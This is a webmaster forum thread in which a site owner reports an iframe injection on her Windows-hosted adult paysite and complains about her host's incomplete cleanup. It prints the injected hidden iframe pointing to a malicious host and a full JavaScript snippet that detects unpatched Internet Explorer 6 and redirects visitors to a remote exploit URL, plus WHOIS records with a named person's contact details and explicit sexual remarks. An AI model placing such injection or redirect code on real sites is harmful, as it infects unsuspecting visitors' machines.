iframe worm on windows boxes

[WannaShagg]

the iframe worm is still active and microsoft is full of shit they have no damn patch.

iframe worm is on windows boxes, i suggest you go to your pages and view source. you will not see code in your

html editor, you will only see it live.

code, i am leaving off start and end of code so it does not run by accident:
iframe src=http://wvw.beech-info2.com/_vti_con/rip.asp width=0 height=0 frameborder=0 marginwidth=0

marginheight=0></iframe

domain: beech-info2.com
status: production
owner: ryan shepherd
email: ryan_shepherdpp@yahoo.com
address: 3050 w 4th st 101
city: los angeles
state: CA
postal-code: 90020
country: US
admin-c: ryan_shepherdpp@yahoo.com#0
tech-c: ryan_shepherdpp@yahoo.com#0
billing-c: ryan_shepherdpp@yahoo.com#0
nserver: a.ns.joker.com 194.176.0.2
nserver: b.ns.joker.com 194.245.101.19
nserver: c.ns.joker.com 194.245.50.1
registrar: JORE-1
created: 2003-07-24 10:01:49 UTC JORE-1
expires: 2005-07-24 06:01:30 UTC
source: joker.com

domain: joker.com
status: production
owner: Siegfried Langenbach
email: admin@joker.com
address: Rathausufer 16
city: Duesseldorf
state: NRW
postal-code: 40213
country: DE
admin-c: admin@joker.com#1
tech-c: admin@joker.com#1
billing-c: hostmaster@joker.com#0
reseller-1: CSL Computer Service Langenbach GmbH
reseller-2: Duesseldorf, Germany
reseller-3: Visit www.nrw.net to get Domains
nserver: ns.nrw.net 194.176.0.14
nserver: ns2.csl-gmbh.net 194.245.101.58
registrar: JORE-1
created: 1994-11-27 00:00:00 UTC NSI
modified: 2003-06-24 23:33:25 UTC JORE-1
expires: 2006-08-03 11:02:10 UTC

BIG BIG PROBLEM, CHECK YOUR SITES, IT HAS BEEN GOING ON FOR WEEKS NOW

[Cleo]

As each day goes by I'm just more and more joyed that I don't use Windose.

[WannaShagg]

yeah, my domain on freehost has had no trouble at all. thank god they are not on windows, obviously...

of course i need a pay host because i have a members area on my main domain, which is the one with the problem.

the worm does not get into the members area, however, it's hard to sell a membership to my paysite when the browser is getting bull installed on their machines.

then when my isp patched my site, they only patched the root, they said f*ck the other thousands of pages. now they are telling me i have to wait my turn in line.

i am fuming, called them everyday, twice a day for two weeks. would have had better quicker results if i just reappointed the domain. which i am doing now, to unix box. and getting another credit from INTERLAND|pissleft|. so you guys know who not to use.

it would have been nice if they fixed more than just the couple of pages on the free tour, assholes.

luckily, a while ago, i started sending traffic to that domain from another domain/host. so all my galleries i've been sending, including to you cleo, are on different host.

|rasta| i need one

[RawAlex]

Umm, is this a NEW worm thing, or is this the old one and your host just failed to install patches that have been available for months now?

Alex

[WannaShagg]

what is the old worm thing?

how can i tell the difference? it will help me get my credit.

do you have any references about it?

the thing that is burning me up is that they fixed only the pages off the root dir and left all the other pages. leaving me to think the site was fixed, whenit is not

now they are telling me i have to wait. wait for what, you fixed some of the pages now fix the rest. bunch of idiots. dah, they weren't thorough either way. they did the pages off the root dir and the patch stayed, whcih lets me understand they never addresses any pages in the sub dirs, if they had the patch would have help there too.

i had another worm in late july which they gave me credit, now i want credit for this botched job.

code on first one:
<HTML>
<SCRIPT LANGUAGE="javascript">
<!--
function ereg(tofind,tocheck)
{
exist=tocheck.indexOf(tofind);
if(exist==-1)
{ return false; }
else
{ return true; }
}
function FindMaxP()
{
Max=0;

PList = clientInformation.appMinorVersion;
TabSplit=new Array();
PVersTab=new Array();

CharToClear=/\s/g;
PList=PList.replace(CharToClear,"");

rech=/\;/;
TabSplit=PList.split(rech);

for(i=0,key=0;i<TabSplit.length;i++)
{
PString=TabSplit[i];
TempLength=PString.length;
FirstChar=PString.substring(0,1);
FirstChar=FirstChar.toUpperCase();

if(FirstChar=="Q")
{
ToKeep=PString.substring(1,TempLength);
PVersTab[key]=ToKeep;
key++;
}
}

Max=PVersTab[0];
for(i=0;i<PVersTab.length;i++)
{
ValTemp=PVersTab[i];
if(ValTemp>Max)
{
Max=ValTemp;
}
}

return Max;
}

function IsP()
{
var ms = navigator.appVersion;
PList = clientInformation.appMinorVersion;
SP_found = ereg("SP",PList);

if(ereg("MSIE 6",ms))
{
Max=FindMaxP();
if(SP_found == true || Max>=313675)
{
}
else
{
window.location.href='http://216.247.117.113/cgi-bin/readme.pl';
}
}
}

//-->

</SCRIPT>
<BODY onload="IsP();"></BODY>
</html>

this new code is a little short one. recognize any of it?

doesn't matter, i called they fixed only a few pages, so right there it tells me they have the abiltiy but just didn't do a good job. now to get the rest of the pages fixed they are giving me this rash of shit that they can't. well then if that's true you should at least put the code back on the pages youremoved it from before telling a paying customer you can't do it. amkes them sound like lazy asses, lloking to blames someone else like microsoft.

hey these things happen. but when you fix something, agree to fix it 100% not just half assed. then when you get caught half assingit, admit you half assed it and fix the shit.

they are not the hackers but they are the lazy sob's that fixed like 10 pages on the root and left the other several thousand infected. so they have the means but not the brains to resolve it.

[RawAlex]

While there are a number of security issues ongoing at microsoft (I checked their security pages), the Iframe thing had it's last patch issued in June, from what I can tell. If an update has been run any time since then, the patch should be installed.

The problem with most server instalations is that these boxes are never used from the console, and nobody runs the updates.

Using IIS / microsoft web server is just not a very good idea, it isn't robust enough, it has security issues (such as you are mentioning) and maintaining the servers is work. Most importantly, valuable system resources are wasted maintaining a desktop that nobody uses. You need windows for a webserver like you need a microwave over to drive a car.

IMHO, of course.

Alex

[WannaShagg]

great feedback. i have always heard disasters about windows but it never affected me.

believe me, i am working on the solution right now.

i am learning alot as time goes on. started the site initially because when i first went to the nude beach, i learned i did not have an average pussy.

things went on from there and after much interest in my genetalia i decided to start my paysite, http://www.adultcustomgoods.com/, to market my crotch, hmm, basically.

PS, THE CODE IS GONE SO IF YOU GO TO THE URL YOU WILL NOT GET MAILICOUS CODE.

i never even surfed porn when i started this site, didn't even own a computer.

that was back in 99 when me and now hubby, started taking pics for the site. i have evolved a lot since then and so have times and the industry.

i am a lot more knowledgable about tech type things and marketing. so i know it's time to make a move. it's not the iframe thing that is my biggest problem, it is my isp.

either way, windows and interland are history for me. i have gotten better results with my free host, i use on my tgp sites to drive traffic to http://www.adultcustomgoods.com/.

i have to use paid host for my pay site obviously. but for tgp posting and a traffice source, i have no problem with my present providers.

unfortunately, i am having trouble with the one site that ultimately pays the bills. i am feeling it. just trying to get more pages up there to compensate.

i have security set onmy browser to prompt me if i want to allow activ x to run. the innocent surfer is not as well prepared. so why would they sign up to my site after they take the tour and find a bunch of shortcuts on their desktop.

i raised cain, and the issue is being resolved but hackers or not, theisp dropped the ball and now they are going to feel it straight up their ass.

i have gotten credit before from them and anticipate antoher. and if not, hey, what adult webmaster hasn't heard of chargeback. i already told them in plain english that they were not getting paid, whether they credit me or not.

i'm sure it'll work out. back to work